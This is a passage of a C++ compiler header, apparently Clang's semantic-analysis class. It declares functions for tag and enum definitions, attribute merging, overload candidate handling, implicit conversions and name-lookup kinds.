return Comparison != DefaultedComparisonKind::None;
}
explicit operator bool() const {
return isSpecialMember() || isComparison();
}
CXXSpecialMember asSpecialMember() const { return SpecialMember; }
DefaultedComparisonKind asComparison() const { return Comparison; }
/// Get the index of this function kind for use in diagnostics.
unsigned getDiagnosticIndex() const {
static_assert(CXXInvalid > CXXDestructor,
"invalid should have highest index");
static_assert((unsigned)DefaultedComparisonKind::None == 0,
"none should be equal to zero");
return SpecialMember + (unsigned)Comparison;
}
};
DefaultedFunctionKind getDefaultedFunctionKind(const FunctionDecl *FD);
CXXSpecialMember getSpecialMember(const CXXMethodDecl *MD) {
return getDefaultedFunctionKind(MD).asSpecialMember();
}
DefaultedComparisonKind getDefaultedComparisonKind(const FunctionDecl *FD) {
return getDefaultedFunctionKind(FD).asComparison();
}
void ActOnLastBitfield(SourceLocation DeclStart,
SmallVectorImpl<Decl *> &AllIvarDecls);
Decl *ActOnIvar(Scope *S, SourceLocation DeclStart,
Declarator &D, Expr *BitfieldWidth,
tok::ObjCKeywordKind visibility);
// This is used for both record definitions and ObjC interface declarations.
void ActOnFields(Scope *S, SourceLocation RecLoc, Decl *TagDecl,
ArrayRef<Decl *> Fields, SourceLocation LBrac,
SourceLocation RBrac, const ParsedAttributesView &AttrList);
/// ActOnTagStartDefinition - Invoked when we have entered the
/// scope of a tag's definition (e.g., for an enumeration, class,
/// struct, or union).
void ActOnTagStartDefinition(Scope *S, Decl *TagDecl);
/// Perform ODR-like check for C/ObjC when merging tag types from modules.
/// Differently from C++, actually parse the body and reject / error out
/// in case of a structural mismatch.
bool ActOnDuplicateDefinition(DeclSpec &DS, Decl *Prev,
SkipBodyInfo &SkipBody);
typedef void *SkippedDefinitionContext;
/// Invoked when we enter a tag definition that we're skipping.
SkippedDefinitionContext ActOnTagStartSkippedDefinition(Scope *S, Decl *TD);
Decl *ActOnObjCContainerStartDefinition(Decl *IDecl);
/// ActOnStartCXXMemberDeclarations - Invoked when we have parsed a
/// C++ record definition's base-specifiers clause and are starting its
/// member declarations.
void ActOnStartCXXMemberDeclarations(Scope *S, Decl *TagDecl,
SourceLocation FinalLoc,
bool IsFinalSpelledSealed,
SourceLocation LBraceLoc);
/// ActOnTagFinishDefinition - Invoked once we have finished parsing
/// the definition of a tag (enumeration, class, struct, or union).
void ActOnTagFinishDefinition(Scope *S, Decl *TagDecl,
SourceRange BraceRange);
void ActOnTagFinishSkippedDefinition(SkippedDefinitionContext Context);
void ActOnObjCContainerFinishDefinition();
/// Invoked when we must temporarily exit the objective-c container
/// scope for parsing/looking-up C constructs.
///
/// Must be followed by a call to \see ActOnObjCReenterContainerContext
void ActOnObjCTemporaryExitContainerContext(DeclContext *DC);
void ActOnObjCReenterContainerContext(DeclContext *DC);
/// ActOnTagDefinitionError - Invoked when there was an unrecoverable
/// error parsing the definition of a tag.
void ActOnTagDefinitionError(Scope *S, Decl *TagDecl);
EnumConstantDecl *CheckEnumConstant(EnumDecl *Enum,
EnumConstantDecl *LastEnumConst,
SourceLocation IdLoc,
IdentifierInfo *Id,
Expr *val);
bool CheckEnumUnderlyingType(TypeSourceInfo *TI);
bool CheckEnumRedeclaration(SourceLocation EnumLoc, bool IsScoped,
QualType EnumUnderlyingTy, bool IsFixed,
const EnumDecl *Prev);
/// Determine whether the body of an anonymous enumeration should be skipped.
/// \param II The name of the first enumerator.
SkipBodyInfo shouldSkipAnonEnumBody(Scope *S, IdentifierInfo *II,
SourceLocation IILoc);
Decl *ActOnEnumConstant(Scope *S, Decl *EnumDecl, Decl *LastEnumConstant,
SourceLocation IdLoc, IdentifierInfo *Id,
const ParsedAttributesView &Attrs,
SourceLocation EqualLoc, Expr *Val);
void ActOnEnumBody(SourceLocation EnumLoc, SourceRange BraceRange,
Decl *EnumDecl, ArrayRef<Decl *> Elements, Scope *S,
const ParsedAttributesView &Attr);
DeclContext *getContainingDC(DeclContext *DC);
/// Set the current declaration context until it gets popped.
void PushDeclContext(Scope *S, DeclContext *DC);
void PopDeclContext();
/// EnterDeclaratorContext - Used when we must lookup names in the context
/// of a declarator's nested name specifier.
void EnterDeclaratorContext(Scope *S, DeclContext *DC);
void ExitDeclaratorContext(Scope *S);
/// Push the parameters of D, which must be a function, into scope.
void ActOnReenterFunctionContext(Scope* S, Decl* D);
void ActOnExitFunctionContext();
DeclContext *getFunctionLevelDeclContext();
/// getCurFunctionDecl - If inside of a function body, this returns a pointer
/// to the function decl for the function being parsed. If we're currently
/// in a 'block', this returns the containing context.
FunctionDecl *getCurFunctionDecl();
/// getCurMethodDecl - If inside of a method body, this returns a pointer to
/// the method decl for the method being parsed. If we're currently
/// in a 'block', this returns the containing context.
ObjCMethodDecl *getCurMethodDecl();
/// getCurFunctionOrMethodDecl - Return the Decl for the current ObjC method
/// or C function we're in, otherwise return null. If we're currently
/// in a 'block', this returns the containing context.
NamedDecl *getCurFunctionOrMethodDecl();
/// Add this decl to the scope shadowed decl chains.
void PushOnScopeChains(NamedDecl *D, Scope *S, bool AddToContext = true);
/// isDeclInScope - If 'Ctx' is a function/method, isDeclInScope returns true
/// if 'D' is in Scope 'S', otherwise 'S' is ignored and isDeclInScope returns
/// true if 'D' belongs to the given declaration context.
///
/// \param AllowInlineNamespace If \c true, allow the declaration to be in the
/// enclosing namespace set of the context, rather than contained
/// directly within it.
bool isDeclInScope(NamedDecl *D, DeclContext *Ctx, Scope *S = nullptr,
bool AllowInlineNamespace = false);
/// Finds the scope corresponding to the given decl context, if it
/// happens to be an enclosing scope. Otherwise return NULL.
static Scope *getScopeForDeclContext(Scope *S, DeclContext *DC);
/// Subroutines of ActOnDeclarator().
TypedefDecl *ParseTypedefDecl(Scope *S, Declarator &D, QualType T,
TypeSourceInfo *TInfo);
bool isIncompatibleTypedef(TypeDecl *Old, TypedefNameDecl *New);
/// Describes the kind of merge to perform for availability
/// attributes (including "deprecated", "unavailable", and "availability").
enum AvailabilityMergeKind {
/// Don't merge availability attributes at all.
AMK_None,
/// Merge availability attributes for a redeclaration, which requires
/// an exact match.
AMK_Redeclaration,
/// Merge availability attributes for an override, which requires
/// an exact match or a weakening of constraints.
AMK_Override,
/// Merge availability attributes for an implementation of
/// a protocol requirement.
AMK_ProtocolImplementation,
};
/// Describes the kind of priority given to an availability attribute.
///
/// The sum of priorities deteremines the final priority of the attribute.
/// The final priority determines how the attribute will be merged.
/// An attribute with a lower priority will always remove higher priority
/// attributes for the specified platform when it is being applied. An
/// attribute with a higher priority will not be applied if the declaration
/// already has an availability attribute with a lower priority for the
/// specified platform. The final prirority values are not expected to match
/// the values in this enumeration, but instead should be treated as a plain
/// integer value. This enumeration just names the priority weights that are
/// used to calculate that final vaue.
enum AvailabilityPriority : int {
/// The availability attribute was specified explicitly next to the
/// declaration.
AP_Explicit = 0,
/// The availability attribute was applied using '#pragma clang attribute'.
AP_PragmaClangAttribute = 1,
/// The availability attribute for a specific platform was inferred from
/// an availability attribute for another platform.
AP_InferredFromOtherPlatform = 2
};
/// Attribute merging methods. Return true if a new attribute was added.
AvailabilityAttr *
mergeAvailabilityAttr(NamedDecl *D, const AttributeCommonInfo &CI,
IdentifierInfo *Platform, bool Implicit,
VersionTuple Introduced, VersionTuple Deprecated,
VersionTuple Obsoleted, bool IsUnavailable,
StringRef Message, bool IsStrict, StringRef Replacement,
AvailabilityMergeKind AMK, int Priority);
TypeVisibilityAttr *
mergeTypeVisibilityAttr(Decl *D, const AttributeCommonInfo &CI,
TypeVisibilityAttr::VisibilityType Vis);
VisibilityAttr *mergeVisibilityAttr(Decl *D, const AttributeCommonInfo &CI,
VisibilityAttr::VisibilityType Vis);
UuidAttr *mergeUuidAttr(Decl *D, const AttributeCommonInfo &CI,
StringRef Uuid);
DLLImportAttr *mergeDLLImportAttr(Decl *D, const AttributeCommonInfo &CI);
DLLExportAttr *mergeDLLExportAttr(Decl *D, const AttributeCommonInfo &CI);
MSInheritanceAttr *mergeMSInheritanceAttr(Decl *D,
const AttributeCommonInfo &CI,
bool BestCase,
MSInheritanceModel Model);
FormatAttr *mergeFormatAttr(Decl *D, const AttributeCommonInfo &CI,
IdentifierInfo *Format, int FormatIdx,
int FirstArg);
SectionAttr *mergeSectionAttr(Decl *D, const AttributeCommonInfo &CI,
StringRef Name);
CodeSegAttr *mergeCodeSegAttr(Decl *D, const AttributeCommonInfo &CI,
StringRef Name);
AlwaysInlineAttr *mergeAlwaysInlineAttr(Decl *D,
const AttributeCommonInfo &CI,
const IdentifierInfo *Ident);
MinSizeAttr *mergeMinSizeAttr(Decl *D, const AttributeCommonInfo &CI);
NoSpeculativeLoadHardeningAttr *
mergeNoSpeculativeLoadHardeningAttr(Decl *D,
const NoSpeculativeLoadHardeningAttr &AL);
SpeculativeLoadHardeningAttr *
mergeSpeculativeLoadHardeningAttr(Decl *D,
const SpeculativeLoadHardeningAttr &AL);
OptimizeNoneAttr *mergeOptimizeNoneAttr(Decl *D,
const AttributeCommonInfo &CI);
SwiftNameAttr *mergeSwiftNameAttr(Decl *D, const AttributeCommonInfo &CI,
StringRef Name, bool Override);
InternalLinkageAttr *mergeInternalLinkageAttr(Decl *D, const ParsedAttr &AL);
InternalLinkageAttr *mergeInternalLinkageAttr(Decl *D,
const InternalLinkageAttr &AL);
CommonAttr *mergeCommonAttr(Decl *D, const ParsedAttr &AL);
CommonAttr *mergeCommonAttr(Decl *D, const CommonAttr &AL);
void mergeDeclAttributes(NamedDecl *New, Decl *Old,
AvailabilityMergeKind AMK = AMK_Redeclaration);
void MergeTypedefNameDecl(Scope *S, TypedefNameDecl *New,
LookupResult &OldDecls);
bool MergeFunctionDecl(FunctionDecl *New, NamedDecl *&Old, Scope *S,
bool MergeTypeWithOld);
bool MergeCompatibleFunctionDecls(FunctionDecl *New, FunctionDecl *Old,
Scope *S, bool MergeTypeWithOld);
void mergeObjCMethodDecls(ObjCMethodDecl *New, ObjCMethodDecl *Old);
void MergeVarDecl(VarDecl *New, LookupResult &Previous);
void MergeVarDeclTypes(VarDecl *New, VarDecl *Old, bool MergeTypeWithOld);
void MergeVarDeclExceptionSpecs(VarDecl *New, VarDecl *Old);
bool checkVarDeclRedefinition(VarDecl *OldDefn, VarDecl *NewDefn);
void notePreviousDefinition(const NamedDecl *Old, SourceLocation New);
bool MergeCXXFunctionDecl(FunctionDecl *New, FunctionDecl *Old, Scope *S);
// AssignmentAction - This is used by all the assignment diagnostic functions
// to represent what is actually causing the operation
enum AssignmentAction {
AA_Assigning,
AA_Passing,
AA_Returning,
AA_Converting,
AA_Initializing,
AA_Sending,
AA_Casting,
AA_Passing_CFAudited
};
/// C++ Overloading.
enum OverloadKind {
/// This is a legitimate overload: the existing declarations are
/// functions or function templates with different signatures.
Ovl_Overload,
/// This is not an overload because the signature exactly matches
/// an existing declaration.
Ovl_Match,
/// This is not an overload because the lookup results contain a
/// non-function.
Ovl_NonFunction
};
OverloadKind CheckOverload(Scope *S,
FunctionDecl *New,
const LookupResult &OldDecls,
NamedDecl *&OldDecl,
bool IsForUsingDecl);
bool IsOverload(FunctionDecl *New, FunctionDecl *Old, bool IsForUsingDecl,
bool ConsiderCudaAttrs = true);
ImplicitConversionSequence
TryImplicitConversion(Expr *From, QualType ToType,
bool SuppressUserConversions,
bool AllowExplicit,
bool InOverloadResolution,
bool CStyle,
bool AllowObjCWritebackConversion);
bool IsIntegralPromotion(Expr *From, QualType FromType, QualType ToType);
bool IsFloatingPointPromotion(QualType FromType, QualType ToType);
bool IsComplexPromotion(QualType FromType, QualType ToType);
bool IsPointerConversion(Expr *From, QualType FromType, QualType ToType,
bool InOverloadResolution,
QualType& ConvertedType, bool &IncompatibleObjC);
bool isObjCPointerConversion(QualType FromType, QualType ToType,
QualType& ConvertedType, bool &IncompatibleObjC);
bool isObjCWritebackConversion(QualType FromType, QualType ToType,
QualType &ConvertedType);
bool IsBlockPointerConversion(QualType FromType, QualType ToType,
QualType& ConvertedType);
bool FunctionParamTypesAreEqual(const FunctionProtoType *OldType,
const FunctionProtoType *NewType,
unsigned *ArgPos = nullptr);
void HandleFunctionTypeMismatch(PartialDiagnostic &PDiag,
QualType FromType, QualType ToType);
void maybeExtendBlockObject(ExprResult &E);
CastKind PrepareCastToObjCObjectPointer(ExprResult &E);
bool CheckPointerConversion(Expr *From, QualType ToType,
CastKind &Kind,
CXXCastPath& BasePath,
bool IgnoreBaseAccess,
bool Diagnose = true);
bool IsMemberPointerConversion(Expr *From, QualType FromType, QualType ToType,
bool InOverloadResolution,
QualType &ConvertedType);
bool CheckMemberPointerConversion(Expr *From, QualType ToType,
CastKind &Kind,
CXXCastPath &BasePath,
bool IgnoreBaseAccess);
bool IsQualificationConversion(QualType FromType, QualType ToType,
bool CStyle, bool &ObjCLifetimeConversion);
bool IsFunctionConversion(QualType FromType, QualType ToType,
QualType &ResultTy);
bool DiagnoseMultipleUserDefinedConversion(Expr *From, QualType ToType);
bool isSameOrCompatibleFunctionType(CanQualType Param, CanQualType Arg);
ExprResult PerformMoveOrCopyInitialization(const InitializedEntity &Entity,
const VarDecl *NRVOCandidate,
QualType ResultType,
Expr *Value,
bool AllowNRVO = true);
bool CanPerformAggregateInitializationForOverloadResolution(
const InitializedEntity &Entity, InitListExpr *From);
bool CanPerformCopyInitialization(const InitializedEntity &Entity,
ExprResult Init);
ExprResult PerformCopyInitialization(const InitializedEntity &Entity,
SourceLocation EqualLoc,
ExprResult Init,
bool TopLevelOfInitList = false,
bool AllowExplicit = false);
ExprResult PerformObjectArgumentInitialization(Expr *From,
NestedNameSpecifier *Qualifier,
NamedDecl *FoundDecl,
CXXMethodDecl *Method);
/// Check that the lifetime of the initializer (and its subobjects) is
/// sufficient for initializing the entity, and perform lifetime extension
/// (when permitted) if not.
void checkInitializerLifetime(const InitializedEntity &Entity, Expr *Init);
ExprResult PerformContextuallyConvertToBool(Expr *From);
ExprResult PerformContextuallyConvertToObjCPointer(Expr *From);
/// Contexts in which a converted constant expression is required.
enum CCEKind {
CCEK_CaseValue, ///< Expression in a case label.
CCEK_Enumerator, ///< Enumerator value with fixed underlying type.
CCEK_TemplateArg, ///< Value of a non-type template parameter.
CCEK_NewExpr, ///< Constant expression in a noptr-new-declarator.
CCEK_ConstexprIf, ///< Condition in a constexpr if statement.
CCEK_ExplicitBool ///< Condition in an explicit(bool) specifier.
};
ExprResult CheckConvertedConstantExpression(Expr *From, QualType T,
llvm::APSInt &Value, CCEKind CCE);
ExprResult CheckConvertedConstantExpression(Expr *From, QualType T,
APValue &Value, CCEKind CCE);
/// Abstract base class used to perform a contextual implicit
/// conversion from an expression to any type passing a filter.
class ContextualImplicitConverter {
public:
bool Suppress;
bool SuppressConversion;
ContextualImplicitConverter(bool Suppress = false,
bool SuppressConversion = false)
: Suppress(Suppress), SuppressConversion(SuppressConversion) {}
/// Determine whether the specified type is a valid destination type
/// for this conversion.
virtual bool match(QualType T) = 0;
/// Emits a diagnostic complaining that the expression does not have
/// integral or enumeration type.
virtual SemaDiagnosticBuilder
diagnoseNoMatch(Sema &S, SourceLocation Loc, QualType T) = 0;
/// Emits a diagnostic when the expression has incomplete class type.
virtual SemaDiagnosticBuilder
diagnoseIncomplete(Sema &S, SourceLocation Loc, QualType T) = 0;
/// Emits a diagnostic when the only matching conversion function
/// is explicit.
virtual SemaDiagnosticBuilder diagnoseExplicitConv(
Sema &S, SourceLocation Loc, QualType T, QualType ConvTy) = 0;
/// Emits a note for the explicit conversion function.
virtual SemaDiagnosticBuilder
noteExplicitConv(Sema &S, CXXConversionDecl *Conv, QualType ConvTy) = 0;
/// Emits a diagnostic when there are multiple possible conversion
/// functions.
virtual SemaDiagnosticBuilder
diagnoseAmbiguous(Sema &S, SourceLocation Loc, QualType T) = 0;
/// Emits a note for one of the candidate conversions.
virtual SemaDiagnosticBuilder
noteAmbiguous(Sema &S, CXXConversionDecl *Conv, QualType ConvTy) = 0;
/// Emits a diagnostic when we picked a conversion function
/// (for cases when we are not allowed to pick a conversion function).
virtual SemaDiagnosticBuilder diagnoseConversion(
Sema &S, SourceLocation Loc, QualType T, QualType ConvTy) = 0;
virtual ~ContextualImplicitConverter() {}
};
class ICEConvertDiagnoser : public ContextualImplicitConverter {
bool AllowScopedEnumerations;
public:
ICEConvertDiagnoser(bool AllowScopedEnumerations,
bool Suppress, bool SuppressConversion)
: ContextualImplicitConverter(Suppress, SuppressConversion),
AllowScopedEnumerations(AllowScopedEnumerations) {}
/// Match an integral or (possibly scoped) enumeration type.
bool match(QualType T) override;
SemaDiagnosticBuilder
diagnoseNoMatch(Sema &S, SourceLocation Loc, QualType T) override {
return diagnoseNotInt(S, Loc, T);
}
/// Emits a diagnostic complaining that the expression does not have
/// integral or enumeration type.
virtual SemaDiagnosticBuilder
diagnoseNotInt(Sema &S, SourceLocation Loc, QualType T) = 0;
};
/// Perform a contextual implicit conversion.
ExprResult PerformContextualImplicitConversion(
SourceLocation Loc, Expr *FromE, ContextualImplicitConverter &Converter);
enum ObjCSubscriptKind {
OS_Array,
OS_Dictionary,
OS_Error
};
ObjCSubscriptKind CheckSubscriptingKind(Expr *FromE);
// Note that LK_String is intentionally after the other literals, as
// this is used for diagnostics logic.
enum ObjCLiteralKind {
LK_Array,
LK_Dictionary,
LK_Numeric,
LK_Boxed,
LK_String,
LK_Block,
LK_None
};
ObjCLiteralKind CheckLiteralKind(Expr *FromE);
ExprResult PerformObjectMemberConversion(Expr *From,
NestedNameSpecifier *Qualifier,
NamedDecl *FoundDecl,
NamedDecl *Member);
// Members have to be NamespaceDecl* or TranslationUnitDecl*.
// TODO: make this is a typesafe union.
typedef llvm::SmallSetVector<DeclContext *, 16> AssociatedNamespaceSet;
typedef llvm::SmallSetVector<CXXRecordDecl *, 16> AssociatedClassSet;
using ADLCallKind = CallExpr::ADLCallKind;
void AddOverloadCandidate(FunctionDecl *Function, DeclAccessPair FoundDecl,
ArrayRef<Expr *> Args,
OverloadCandidateSet &CandidateSet,
bool SuppressUserConversions = false,
bool PartialOverloading = false,
bool AllowExplicit = true,
bool AllowExplicitConversion = false,
ADLCallKind IsADLCandidate = ADLCallKind::NotADL,
ConversionSequenceList EarlyConversions = None,
OverloadCandidateParamOrder PO = {});
void AddFunctionCandidates(const UnresolvedSetImpl &Functions,
ArrayRef<Expr *> Args,
OverloadCandidateSet &CandidateSet,
TemplateArgumentListInfo *ExplicitTemplateArgs = nullptr,
bool SuppressUserConversions = false,
bool PartialOverloading = false,
bool FirstArgumentIsBase = false);
void AddMethodCandidate(DeclAccessPair FoundDecl,
QualType ObjectType,
Expr::Classification ObjectClassification,
ArrayRef<Expr *> Args,
OverloadCandidateSet& CandidateSet,
bool SuppressUserConversion = false,
OverloadCandidateParamOrder PO = {});
void AddMethodCandidate(CXXMethodDecl *Method,
DeclAccessPair FoundDecl,
CXXRecordDecl *ActingContext, QualType ObjectType,
Expr::Classification ObjectClassification,
ArrayRef<Expr *> Args,
OverloadCandidateSet& CandidateSet,
bool SuppressUserConversions = false,
bool PartialOverloading = false,
ConversionSequenceList EarlyConversions = None,
OverloadCandidateParamOrder PO = {});
void AddMethodTemplateCandidate(FunctionTemplateDecl *MethodTmpl,
DeclAccessPair FoundDecl,
CXXRecordDecl *ActingContext,
TemplateArgumentListInfo *ExplicitTemplateArgs,
QualType ObjectType,
Expr::Classification ObjectClassification,
ArrayRef<Expr *> Args,
OverloadCandidateSet& CandidateSet,
bool SuppressUserConversions = false,
bool PartialOverloading = false,
OverloadCandidateParamOrder PO = {});
void AddTemplateOverloadCandidate(
FunctionTemplateDecl *FunctionTemplate, DeclAccessPair FoundDecl,
TemplateArgumentListInfo *ExplicitTemplateArgs, ArrayRef<Expr *> Args,
OverloadCandidateSet &CandidateSet, bool SuppressUserConversions = false,
bool PartialOverloading = false, bool AllowExplicit = true,
ADLCallKind IsADLCandidate = ADLCallKind::NotADL,
OverloadCandidateParamOrder PO = {});
bool CheckNonDependentConversions(
FunctionTemplateDecl *FunctionTemplate, ArrayRef<QualType> ParamTypes,
ArrayRef<Expr *> Args, OverloadCandidateSet &CandidateSet,
ConversionSequenceList &Conversions, bool SuppressUserConversions,
CXXRecordDecl *ActingContext = nullptr, QualType ObjectType = QualType(),
Expr::Classification ObjectClassification = {},
OverloadCandidateParamOrder PO = {});
void AddConversionCandidate(
CXXConversionDecl *Conversion, DeclAccessPair FoundDecl,
CXXRecordDecl *ActingContext, Expr *From, QualType ToType,
OverloadCandidateSet &CandidateSet, bool AllowObjCConversionOnExplicit,
bool AllowExplicit, bool AllowResultConversion = true);
void AddTemplateConversionCandidate(
FunctionTemplateDecl *FunctionTemplate, DeclAccessPair FoundDecl,
CXXRecordDecl *ActingContext, Expr *From, QualType ToType,
OverloadCandidateSet &CandidateSet, bool AllowObjCConversionOnExplicit,
bool AllowExplicit, bool AllowResultConversion = true);
void AddSurrogateCandidate(CXXConversionDecl *Conversion,
DeclAccessPair FoundDecl,
CXXRecordDecl *ActingContext,
const FunctionProtoType *Proto,
Expr *Object, ArrayRef<Expr *> Args,
OverloadCandidateSet& CandidateSet);
void AddNonMemberOperatorCandidates(
const UnresolvedSetImpl &Functions, ArrayRef<Expr *> Args,
OverloadCandidateSet &CandidateSet,
TemplateArgumentListInfo *ExplicitTemplateArgs = nullptr);
void AddMemberOperatorCandidates(OverloadedOperatorKind Op,
SourceLocation OpLoc, ArrayRef<Expr *> Args,
OverloadCandidateSet &CandidateSet,
OverloadCandidateParamOrder PO = {});
void AddBuiltinCandidate(QualType *ParamTys, ArrayRef<Expr *> Args,
OverloadCandidateSet& CandidateSet,
bool IsAssignmentOperator = false,
unsigned NumContextualBoolArguments = 0);
void AddBuiltinOperatorCandidates(OverloadedOperatorKind Op,
SourceLocation OpLoc, ArrayRef<Expr *> Args,
OverloadCandidateSet& CandidateSet);
void AddArgumentDependentLookupCandidates(DeclarationName Name,
SourceLocation Loc,
ArrayRef<Expr *> Args,
TemplateArgumentListInfo *ExplicitTemplateArgs,
OverloadCandidateSet& CandidateSet,
bool PartialOverloading = false);
// Emit as a 'note' the specific overload candidate
void NoteOverloadCandidate(
NamedDecl *Found, FunctionDecl *Fn,
OverloadCandidateRewriteKind RewriteKind = OverloadCandidateRewriteKind(),
QualType DestType = QualType(), bool TakingAddress = false);
// Emit as a series of 'note's all template and non-templates identified by
// the expression Expr
void NoteAllOverloadCandidates(Expr *E, QualType DestType = QualType(),
bool TakingAddress = false);
/// Check the enable_if expressions on the given function. Returns the first
/// failing attribute, or NULL if they were all successful.
EnableIfAttr *CheckEnableIf(FunctionDecl *Function, ArrayRef<Expr *> Args,
bool MissingImplicitThis = false);
/// Find the failed Boolean condition within a given Boolean
/// constant expression, and describe it with a string.
std::pair<Expr *, std::string> findFailedBooleanCondition(Expr *Cond);
/// Emit diagnostics for the diagnose_if attributes on Function, ignoring any
/// non-ArgDependent DiagnoseIfAttrs.
///
/// Argument-dependent diagnose_if attributes should be checked each time a
/// function is used as a direct callee of a function call.
///
/// Returns true if any errors were emitted.
bool diagnoseArgDependentDiagnoseIfAttrs(const FunctionDecl *Function,
const Expr *ThisArg,
ArrayRef<const Expr *> Args,
SourceLocation Loc);
/// Emit diagnostics for the diagnose_if attributes on Function, ignoring any
/// ArgDependent DiagnoseIfAttrs.
///
/// Argument-independent diagnose_if attributes should be checked on every use
/// of a function.
///
/// Returns true if any errors were emitted.
bool diagnoseArgIndependentDiagnoseIfAttrs(const NamedDecl *ND,
SourceLocation Loc);
/// Returns whether the given function's address can be taken or not,
/// optionally emitting a diagnostic if the address can't be taken.
///
/// Returns false if taking the address of the function is illegal.
bool checkAddressOfFunctionIsAvailable(const FunctionDecl *Function,
bool Complain = false,
SourceLocation Loc = SourceLocation());
// [PossiblyAFunctionType] --> [Return]
// NonFunctionType --> NonFunctionType
// R (A) --> R(A)
// R (*)(A) --> R (A)
// R (&)(A) --> R (A)
// R (S::*)(A) --> R (A)
QualType ExtractUnqualifiedFunctionType(QualType PossiblyAFunctionType);
FunctionDecl *
ResolveAddressOfOverloadedFunction(Expr *AddressOfExpr,
QualType TargetType,
bool Complain,
DeclAccessPair &Found,
bool *pHadMultipleCandidates = nullptr);
FunctionDecl *
resolveAddressOfOnlyViableOverloadCandidate(Expr *E,
DeclAccessPair &FoundResult);
bool resolveAndFixAddressOfOnlyViableOverloadCandidate(
ExprResult &SrcExpr, bool DoFunctionPointerConversion = false);
FunctionDecl *
ResolveSingleFunctionTemplateSpecialization(OverloadExpr *ovl,
bool Complain = false,
DeclAccessPair *Found = nullptr);
bool ResolveAndFixSingleFunctionTemplateSpecialization(
ExprResult &SrcExpr,
bool DoFunctionPointerConverion = false,
bool Complain = false,
SourceRange OpRangeForComplaining = SourceRange(),
QualType DestTypeForComplaining = QualType(),
unsigned DiagIDForComplaining = 0);
Expr *FixOverloadedFunctionReference(Expr *E,
DeclAccessPair FoundDecl,
FunctionDecl *Fn);
ExprResult FixOverloadedFunctionReference(ExprResult,
DeclAccessPair FoundDecl,
FunctionDecl *Fn);
void AddOverloadedCallCandidates(UnresolvedLookupExpr *ULE,
ArrayRef<Expr *> Args,
OverloadCandidateSet &CandidateSet,
bool PartialOverloading = false);
// An enum used to represent the different possible results of building a
// range-based for loop.
enum ForRangeStatus {
FRS_Success,
FRS_NoViableFunction,
FRS_DiagnosticIssued
};
ForRangeStatus BuildForRangeBeginEndCall(SourceLocation Loc,
SourceLocation RangeLoc,
const DeclarationNameInfo &NameInfo,
LookupResult &MemberLookup,
OverloadCandidateSet *CandidateSet,
Expr *Range, ExprResult *CallExpr);
ExprResult BuildOverloadedCallExpr(Scope *S, Expr *Fn,
UnresolvedLookupExpr *ULE,
SourceLocation LParenLoc,
MultiExprArg Args,
SourceLocation RParenLoc,
Expr *ExecConfig,
bool AllowTypoCorrection=true,
bool CalleesAddressIsTaken=false);
bool buildOverloadedCallSet(Scope *S, Expr *Fn, UnresolvedLookupExpr *ULE,
MultiExprArg Args, SourceLocation RParenLoc,
OverloadCandidateSet *CandidateSet,
ExprResult *Result);
ExprResult CreateOverloadedUnaryOp(SourceLocation OpLoc,
UnaryOperatorKind Opc,
const UnresolvedSetImpl &Fns,
Expr *input, bool RequiresADL = true);
void LookupOverloadedBinOp(OverloadCandidateSet &CandidateSet,
OverloadedOperatorKind Op,
const UnresolvedSetImpl &Fns,
ArrayRef<Expr *> Args, bool RequiresADL = true);
ExprResult CreateOverloadedBinOp(SourceLocation OpLoc,
BinaryOperatorKind Opc,
const UnresolvedSetImpl &Fns,
Expr *LHS, Expr *RHS,
bool RequiresADL = true,
bool AllowRewrittenCandidates = true,
FunctionDecl *DefaultedFn = nullptr);
ExprResult BuildSynthesizedThreeWayComparison(SourceLocation OpLoc,
const UnresolvedSetImpl &Fns,
Expr *LHS, Expr *RHS,
FunctionDecl *DefaultedFn);
ExprResult CreateOverloadedArraySubscriptExpr(SourceLocation LLoc,
SourceLocation RLoc,
Expr *Base,Expr *Idx);
ExprResult
BuildCallToMemberFunction(Scope *S, Expr *MemExpr,
SourceLocation LParenLoc,
MultiExprArg Args,
SourceLocation RParenLoc);
ExprResult
BuildCallToObjectOfClassType(Scope *S, Expr *Object, SourceLocation LParenLoc,
MultiExprArg Args,
SourceLocation RParenLoc);
ExprResult BuildOverloadedArrowExpr(Scope *S, Expr *Base,
SourceLocation OpLoc,
bool *NoArrowOperatorFound = nullptr);
/// CheckCallReturnType - Checks that a call expression's return type is
/// complete. Returns true on failure. The location passed in is the location
/// that best represents the call.
bool CheckCallReturnType(QualType ReturnType, SourceLocation Loc,
CallExpr *CE, FunctionDecl *FD);
/// Helpers for dealing with blocks and functions.
bool CheckParmsForFunctionDef(ArrayRef<ParmVarDecl *> Parameters,
bool CheckParameterNames);
void CheckCXXDefaultArguments(FunctionDecl *FD);
void CheckExtraCXXDefaultArguments(Declarator &D);
Scope *getNonFieldDeclScope(Scope *S);
/// \name Name lookup
///
/// These routines provide name lookup that is used during semantic
/// analysis to resolve the various kinds of names (identifiers,
/// overloaded operator names, constructor names, etc.) into zero or
/// more declarations within a particular scope. The major entry
/// points are LookupName, which performs unqualified name lookup,
/// and LookupQualifiedName, which performs qualified name lookup.
///
/// All name lookup is performed based on some specific criteria,
/// which specify what names will be visible to name lookup and how
/// far name lookup should work. These criteria are important both
/// for capturing language semantics (certain lookups will ignore
/// certain names, for example) and for performance, since name
/// lookup is often a bottleneck in the compilation of C++. Name
/// lookup criteria is specified via the LookupCriteria enumeration.
///
/// The results of name lookup can vary based on the kind of name
/// lookup performed, the current language, and the translation
/// unit. In C, for example, name lookup will either return nothing
/// (no entity found) or a single declaration. In C++, name lookup
/// can additionally refer to a set of overloaded functions or
/// result in an ambiguity. All of the possible results of name
/// lookup are captured by the LookupResult class, which provides
/// the ability to distinguish among them.
//@{
/// Describes the kind of name lookup to perform.
enum LookupNameKind {
/// Ordinary name lookup, which finds ordinary names (functions,
/// variables, typedefs, etc.) in C and most kinds of names
/// (functions, variables, members, types, etc.) in C++.
LookupOrdinaryName = 0,
/// Tag name lookup, which finds the names of enums, classes,
/// structs, and unions.
LookupTagName,
/// Label name lookup.
LookupLabel,
/// Member name lookup, which finds the names of
/// class/struct/union members.
LookupMemberName,
/// Look up of an operator name (e.g., operator+) for use with
/// operator overloading. This lookup is similar to ordinary name
/// lookup, but will ignore any declarations that are class members.
LookupOperatorName,
/// Look up of a name that precedes the '::' scope resolution
/// operator in C++. This lookup completely ignores operator, object,
/// function, and enumerator names (C++ [basic.lookup.qual]p1).
LookupNestedNameSpecifierName,
/// Look up a namespace name within a C++ using directive or
/// namespace alias definition, ignoring non-namespace names (C++
/// [basic.lookup.udir]p1).
LookupNamespaceName,
/// Look up all declarations in a scope with the given name,
/// including resolved using declarations. This is appropriate
/// for checking redeclarations for a using declaration.
LookupUsingDeclName,
